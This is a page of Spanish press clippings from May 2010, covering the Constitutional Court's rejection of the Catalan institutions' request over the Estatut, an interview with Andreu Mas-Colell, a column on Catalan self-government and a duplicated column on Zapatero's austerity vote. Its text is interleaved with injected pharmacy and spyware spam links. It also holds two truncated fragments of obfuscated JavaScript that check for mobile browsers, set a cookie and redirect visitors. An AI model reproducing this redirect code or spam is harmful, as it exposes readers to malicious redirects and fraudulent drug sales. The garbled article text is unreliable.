• Noticias maquetadas 28.05.2010

    Portazo del TC a la petición de que se declare incompetente sobre el Estatut Buy online

    http://www.annamoes.com/sinemet-cr-cost/ Purchase

    El pleno responde en menos de veinticuatro horas que «no ha lugar» a la solicitud

    online

    JOSÉ MARÍA BRUNET – Madrid

    Por una vez, y para darle un portazo al Govern de la Generalitat y al Parlament de Catalunya, el Tribunal Constitucional (TC) actuó ayer con rapidez. Podría decirse que con inusitada rapidez. Fue para resolver, en menos de veinticuatro horas, los escritos remitidos por el Ejecutivo y la Cámara catalanas con objeto de que el TC se abstenga de decidir sobre los recursos presentados contra el Estatut, declarándose incompetente para ello. La iniciativa no tiene precedentes, como no los tiene la trayectoria y la situación del actual TC, que celebró un pleno específico y extraordinario en el que se limitó a resolver que «no ha lugar» a atender la solicitud formulada. Esa fue toda la respuesta. Mayor contundencia y brevedad, imposibles.

    El Constitucional, por tanto, gastó poca tinta para contestar a los planteamientos que el Govern y el Parlament exponían con detenimiento, en veinticinco folios, en el caso de este último. El pleno del TC consideró suficiente un lacónico «no ha lugar» sin la menor reflexión, argumento o análisis. Sólo lo acompañó de una mención, entre paréntesis, del artículo 17.2 de la ley orgánica que regula el funcionamiento del propio TC. Este precepto, que ni siquiera se cita textualmente, determina que los miembros del Constitucional «continuarán en el ejercicio de sus funciones hasta que hayan tomado posesión quienes hubieren de sucederles». Las instituciones catalanas, a su vez, habían planteado que en su actual situación el TC no está en condiciones de resolver los recursos contra el Estatut. El texto del Parlament afirmaba que «el incumplimiento de la renovación periódica» del TC «significa una vulneración directa y frontal de la Constitución».

    Buy

    http://www.melissa-arnold.com/2018/02/02/cheap-slimex-sibutramine/

    No se recuerda, por otra parte, una reunión del pleno convocada con tantas prisas, salvo para resolver las primeras recusaciones presentadas cuando comenzó la guerra interna del Constitucional, en aquella ocasión contra la propia presidenta, María Emilia Casas, y contra el magistrado Pablo Pérez-Tremps, que fue apartado del caso, mientras la primera impugnación era rechazada de plano y de un plumazo.

    En teoría, por tanto, las deliberaciones sobre el Estatut siguen en el Constitucional. Cabría decir que es lo único, o de lo poco, que sigue en la institución, porque habitualmente a estas alturas de mayo el TC ya ha resuelto decenas de asuntos, mientras en el año en curso sigue encallado en la discusión sobre la reforma catalana, mientas casi todo lo demás va cogiendo polvo en las estanterías de la institución.

    En estos momentos, la iniciativa la tiene la presidenta, María Emilia Casas, como tercera ponente designada para intentar la elaboración de un proyecto de fallo. El suyo será el séptimo intento, después de los fracasos registrados por las cinco ponencias elaboradas por la magistrada Elisa Pérez-Vera, y por el que sometió a votación el vicepresidente del TC, Guillermo Jiménez.

    Casas es perfectamente consciente de la dificultad de su labor, y por ello ha empezado por solicitar que se estudie la posibilidad de aprobar una sentencia por partes – ya sean artículos o bloques de normas-,más o menos como se construyen los trazados ferroviarios, sólo que sin saber a ciencia cierta qué materiales se colocarán en cada tramo, ni si serán compatibles entre sí. La propia presidenta del TC afirmó anteanoche en Valencia que la votación artículo por artículo se llevará a cabo sólo si fracasa el nuevo intento de aprobar una propuesta global de fallo. Casas manifestó su esperanza de que pueda dictarse sentencia antes del próximo verano. En el TC saben que tienen tiempo para volver a intentarlo, porque están convencidos de que la renovación pretendidamente impulsada esta semana no prosperará.

  • Noticias maquetadas 28.05.2010

    ENTREVISTA

    «Es hora de consolidar lo que funciona, no de iniciar grandes proyectos»

    Andreu Mas-Colell, secretario general del Consejo Europeo de Investigación

    JOSEP CORBELLA – Barcelona

    La crisis ha situado a Andreu Mas-Colell ante un difícil dilema. Su mente de economista sabe que es imprescindible recortar el gasto público. Su mente de gestor científico sabe que es imprescindible invertir en ciencia para sentar las bases de una economía competitiva. En esta entrevista, realizada ayer en el Institut d´Estudis Catalans, explica por primera vez su opinión sobre cómo invertir en I+ D en tiempos de crisis.

    ¿Hay que aumentar la inversión en I+ D o hay que recortar?

    Hay que ser realistas. La probabilidad de que se produzcan incrementos en la inversión en I+ D es baja. Pero en momentos como este se pueden aplicar unos principios básicos para que, una vez salgamos de la crisis, estemos en las mejores condiciones posibles.

    Cheap cost of septilin syrup

    ¿En qué principios piensa?

    La continuidad es importante en los proyectos científicos y siempre cuesta más reconstruir lo que se ha perdido que mantener lo que se tiene. Es el momento de consolidar lo que funciona bien, no de iniciar grandes proyectos.

    ¿Algún otro principio?

    Hay que ser más selectivo a la hora de decidir qué se financia.

    La comunidad científica teme que España pierda la excelencia científica que ha conseguido en los últimos años.

    Esto es como subir una escalera, En los últimos años hemos subido mucho. Ahora estamos en un rellano. De lo que se trata es de afianzar lo que hemos construido, no retroceder, para volver a subir rápidamente cuando pase la crisis. Lo que sería nefasto sería que se dejaran de apoyar los centros de investigación o los programas que funcionan bien.

    Cheap

    Cuando dice que hay que ser selectivo, ¿quiere decir que hay que priorizar la excelencia?

    Hay que apostar por la excelencia, el problema a veces es cómo conseguirlo. Creo que este es un buen momento para los acuerdos público-privados. El sector público es necesario para financiar los proyectos de investigación, pero está mal situado para priorizar la excelencia. El sector privado está bien situado para seleccionar los mejores proyectos, pero no llega a financiarlos hasta el final. Los acuerdos público-privados facilitan financiar proyectos de excelencia hasta el final.

    En su intervención hoy en el Institut d´Estudis Catalans, ha destacado a Suiza como un ejemplo de éxito en I+ D. ¿Qué podemos aprender de ella?

    Es muy instructiva la historia de la Escuela Politécnica Federal de Lausana. Su patronato fichó hace unos años como presidente, lo que aquí llamaríamos el rector, a un neurocientífico que venía de EE. UU. Le dio un presupuesto y libertad para fichar a investigadores. Hoy es la universidad de Europa continental con más científicos financiados por el Consejo Europeo de Investigación.

    ¿Qué tiene esto de instructivo para Catalunya? Pills

    Nuestras universidades necesitan patronatos fuertes. Ya me parecen bien los consejos sociales, pero con más peso y con capacidad de nombrar a la máxima autoridad universitaria, que se podría fichar de cualquier lugar del mundo, y de darle medios.

    Cheap

    cheap anacin ¿Le parece viable esto en las universidades de Catalunya?

    Lo que es seguro es que, si tenemos menos dinero que el que tienen por ejemplo en Lausana, y además no podemos aplicar las medidas que funcionan en el resto del mundo, entonces iremos hacia abajo.

    52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])} Purchase

  • Noticias maquetadas 28.05.2010

    Hoja de ruta

    Xavier Bru de Sala

    buy casodex http://fasad-krimea.ru/order-cefadroxil-dosage/ Buy Buy

    Habiendo comprobado la involución autonómica de España (véase el manifiesto de sesenta intelectuales, al cual me adhiero) y casi con independencia de la sentencia, va siendo hora de planificar algún modo de cambiar la relación de Catalunya con su entorno.

    http://goodbadbart.nl/uncategorized/order-periactins/

    Según el president Montilla, el recorte del Estatut a cargo del Constitucional incrementaría la desafección y daría argumentos a los independentistas. Cierto, como cierto es que arruinaría su presidencia y comportaría el más triste y decepcionante final para la etapa de los tripartitos. Como cierto es, si atendemos tanto a la nariz como al último sondeo de La Vanguardia,que no sólo, aun sin sentencia, el independentismo sigue al alza, sino, más significativo si cabe, que en año y medio los que están en contra han bajado diez puntos. Cuatro en sólo dos meses. De este auge se deduce algo más importante aún que la alternativa entre recortar la autonomía o dejarla como está. Lo crucial, a mi modo de entender, es la búsqueda de una salida, o mejor una propuesta, que pueda satisfacer las ansias compartidas de mayor autogobierno. Si la pregunta es cómo evitar el auge del independentismo, la respuesta no pude limitarse a respetar el acuerdo de las Cortes y la voz popular. Que el tribunal renunciara a pronunciarse (algo posible pero de previsión poco menos que rocambolesca) sería bienvenido por todos. Pero no bastaría. La involución española está ahí, y corre pareja con la creciente insatisfacción catalana (que no desafección, al menos por mi parte).

    Alguna alternativa o espacio debe haber entre la situación actual, con sus aciagas perspectivas, y la independencia. La condición es no basarla en el pactismo, pues ha dado de sí casi todo lo que podía, o tal vez más (o sea menos) de lo que ingenuamente algunos esperaban. ¿En qué entonces? En el consenso catalán. Lo primero es saber qué pretendemos, aqué aspiramos como sociedad. La hoja debe ir más allá del texto del Estatut aprobado por el Parlament para erigirse en punto de llegada y no parada intermedia. A eso conviene dedicar la próxima legislatura (al tiempo que se consigue lo que se pueda, siguiendo la única vía posible, el peix al cove,si es que vuelve a haber brecha para ello). Un debate político, social y cultural para definir qué Catalunya estamos dispuestos a ambicionar, cómo y en qué contexto español y europeo encajaría. Luego, sólo luego y según la metodología aquí propuesta, habría que plantearlo en Madrid. Quienes creemos en el bilateralismo con España deberíamos empezar por el unilateralismo.

    Cheap

    Ni que decir tiene que el PSC es crucial para que prospere una propuesta de este tenor, sólo posible desde la centralidad y contando con el beneplácito del establishment catalán (o por lo menos con una modulada hostilidad). De las palabras y actitudes de los consellers socialistas se desprende que no lo verían con malos ojos. ¿Y Montilla? Por desgracia no está en su discurso. El president se ha erigido en defensor del Estatut vigente, y habla de él como si se tratara de la panacea, la solución, la estación final. O eso o la independencia, que él no desea. Como si eso, dejarlo como está, comportara la solución a la mayor parte de las insatisfacciones catalanas. Comprendo que, puestos a defender el Estatut, ponga toda la argumentación en el asador, pero desde luego el supuesto argumental no es realista. Podría ser efectivo, aunque pocos lo creen, pero aun sin sentencia no va a ser así. Tal vez Montilla esté a tiempo de replanteárselo; puede que esté entre sus planes no confesados, pero desde luego el presidente de los catalanes en la próxima legislatura debería estar dispuesto a liderar la elaboración de la nueva hoja de ruta o como quieran llamarla (y luego a liderar su presentación como ultimátum a Madrid).

    En resumen y valga mentar una ya acreditada comparación. Es como en una pareja en la cual la parte maltratada, antes de dar el último paso, concede una oportunidad, ya por escrito, donde especifica los cambios necesarios a fin de evitar la ruptura. Por eso afirmaba que lo primero y primordial es el consenso sobre una hoja de ruta. Una vez establecida, si la España controlada por Madrid la admite y modifica su arquitectura constitucional, pues allá nos quedamos. De lo contrario, quedaría claro que de allá nos vamos, por las buenas y tan amigos, a la manera escandinava que es ejemplo de civilización.

    Purchase

    Mientras no comprenda que su futuro pasa por admitir de veras su plurinacionalidad en pie de igualdad, España será un problema para sí misma, además de ser el problema, el principal problema, para los catalanes. Dicho esto, y a tenor de las escandalosas noticias reveladas en los últimos días, es lícito poner en duda que Catalunya sea la solución. ¿De qué sirve el autogobierno y su incremento, si no es en primer lugar para disminuir la indecencia en la vida pública? Los países grandes pueden permitirse unas zonas de sombra y desvergonzonería que asfixiarían a los pequeños. O somos un poco calvinistas o seremos cada vez más españoles en el peor sentido de la palabra.

    your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}gsp tracker, best spyware for iphone, spy iphone

  • Noticias maquetadas 28.05.2010

    AJUSTE DE CUENTAS

    JOHN MÜLLER

    Victoria sin principios

    Ayer, el Gobierno se presentó desmadejado a votar su plan de ajuste. Zapatero, con el rostro desencajado. Salgado, sin convicción. Chaves, con expresión de estar comiéndose varios sapos. El presidente, acobardado y sin ganas, no dio la cara, pese a que hubo unanimidad de los grupos en querer partírsela. Dejó sola a Salgado en la presentación del decreto ley. Eso acentuó la sensación de vacío.

    Rajoy le dijo: «Este decreto simboliza el fracaso de toda su política». Y enseguida le acusó de ser el principal problema de la economía española.

    En parte tiene razón. Esa broma de las «dos tardes» de Jordi Sevilla nos ha pasado factura, porque era cierta. Resulta increíble que una persona como Zapatero, que le ha sacado tanto partido a la democracia, comprenda tan mal los mecanismos de la economía. No digo que no conozca los mercados. Digo que no sabe vivir con ellos.

    Sólo así se explica que en tres días pasara de defender el gasto a combatir el déficit. Y lo ha hecho con unas medidas donde ha pesado más el efecto que iban a proyectar en el exterior que su auténtico valor presupuestario. Zapatero quería dar una lección a los mercados y no lo logró. En las dos sesiones que siguieron a su anuncio, el Ibex se desmoronó un -1,1% y un -6,6%, y todavía no se ha recuperado.

    Los mercados cuando detectan una inconsistencia, rápidamente se lanzan a por ella para ver si pueden ganar dinero especulando. Esa incongruencia puede ser una rigidez formal (como ocurrió en los años 90 con el Sistema Monetario Europeo) o un elemento subjetivo como la credibilidad. En este caso, los mercados vieron claramente que un presidente no se puede convertir a la correcta doctrina económica en menos de una semana. Le tomaron la medida a Zapatero y lo tienen a su merced desde el 12 de mayo.

    Llamazares le recuerda todo el tiempo a Zapatero que «no se puede gobernar al albur de los mercados». Esa afirmación es esencialmente cierta. La política no puede hacerse a favor ni en contra del mercado. El presidente ha pasado de insultarlo a temerlo.

    Pero si en términos de mercados la apuesta de Zapatero ha sido una fracaso, en términos políticos ha sido un desastre mayor. Si sus amigos dicen que está «destrozado» es porque en su rostro hay huellas visibles de su incoherencia ideológica. «Lo peor es que ha hecho lo que siempre dijo que no iba a hacer», decía ayer un alto cargo. Al final se apuntó una victoria sin principios.

    El catalán Duran, de CiU, que con la abstención de ayer facilitó el triunfo de Zapatero, le dijo lo mismo que Rajoy: «El problema es usted. Se acabó su etapa como presidente del Gobierno». Sin embargo, sacaron conclusiones distintas: Rajoy cree que debe haber elecciones ya, Duran -más masoquista- le pidió que siga, que adopte las medidas impopulares y que cuando fracase en la aprobación de los próximos Presupuestos «será la hora de convocar elecciones».

    Un zombi es un muerto resucitado por un hechicero para convertirlo en su esclavo. Zapatero era ayer un cadáver y Duran, con sus votos, lo transformó en un zombi. Y a España la ha condenado a seis meses más de inestabilidad económica.

    john.muller@elmundo.es

    AJUSTE DE CUENTAS

    JOHN MÜLLER
    Victoria sin principios

    * Disminuye el tamaño del texto
    * Aumenta el tamaño del texto

    Ayer, el Gobierno se presentó desmadejado a votar Purchase su plan de ajuste. Zapatero, con el rostro desencajado. Salgado, sin convicción. Chaves, con expresión de estar comiéndose varios sapos. El presidente, acobardado y sin ganas, no dio la cara, pese a que hubo unanimidad de los grupos en querer partírsela. Dejó sola a Salgado en la presentación del decreto ley. Eso acentuó la sensación de vacío.

    Rajoy le dijo: «Este decreto simboliza el fracaso de toda su política». Y enseguida le acusó de ser el principal problema Cheap de la economía española.

    En parte tiene razón. Esa broma de las «dos tardes» de Jordi Sevilla nos ha pasado factura, porque era cierta. Resulta increíble que una persona como Zapatero, que le ha sacado tanto partido a la democracia, comprenda tan mal los mecanismos de la economía. No digo que no conozca los mercados. Digo que no sabe vivir con ellos.

    Sólo así se explica que en tres días pasara de defender el gasto a combatir el déficit. Y lo ha hecho con unas medidas donde ha pesado más el efecto que iban a proyectar en el exterior que su auténtico online valor presupuestario. Zapatero quería dar una lección a los mercados y no lo logró. En las dos sesiones que siguieron a su anuncio, el Ibex se desmoronó un -1,1% y un -6,6%, y todavía no se ha recuperado.

    Los mercados cuando detectan una inconsistencia, rápidamente se lanzan a por ella para ver si pueden ganar dinero especulando. Esa incongruencia puede ser una rigidez formal (como ocurrió en los años 90 con el Sistema Monetario Europeo) o un elemento subjetivo como la credibilidad. En este caso, los mercados vieron claramente que un presidente no se puede convertir a la correcta doctrina económica en menos de una semana. Le http://healthyfundraiser.com.au/order-hyzaar-side tomaron la medida a Zapatero y lo tienen a su merced desde el 12 de mayo.

    Llamazares le recuerda todo el tiempo a Zapatero que «no se puede gobernar al albur de los mercados». Esa afirmación es esencialmente cierta. La política no puede hacerse a favor http://demo.netzdesigno.com/generic-avodart-review/ ni en contra del mercado. El presidente ha pasado de insultarlo a temerlo.

    Pero si en términos de mercados la apuesta de Zapatero ha sido una fracaso, en términos políticos ha sido un desastre mayor. Si sus amigos dicen que está «destrozado» es porque en su rostro hay huellas visibles de su incoherencia ideológica. «Lo peor es que ha hecho lo que siempre dijo que no iba a hacer», decía ayer un alto cargo. Al final se apuntó una victoria sin principios.

    El Buy catalán Duran, de CiU, que con la abstención de ayer facilitó el triunfo de Zapatero, le dijo lo mismo que Rajoy: «El problema es usted. Se acabó su etapa como presidente del Gobierno». Sin embargo, sacaron conclusiones distintas: Rajoy cree que debe haber elecciones ya, Duran -más masoquista- le pidió que siga, que adopte las medidas impopulares y que cuando fracase en la aprobación de los próximos Presupuestos «será la hora de convocar elecciones».

    Un zombi es un muerto resucitado por un hechicero para convertirlo en su esclavo. Zapatero era ayer un cadáver y Duran, con sus votos, lo transformó en un Order zombi. Y a España la ha condenado a seis meses más de inestabilidad económica.

    john.muller@elmundo.es

Calendario de artículos

mayo 2010
L M X J V S D
 12
3456789
10111213141516
17181920212223
24252627282930
31  

Artículos anteriores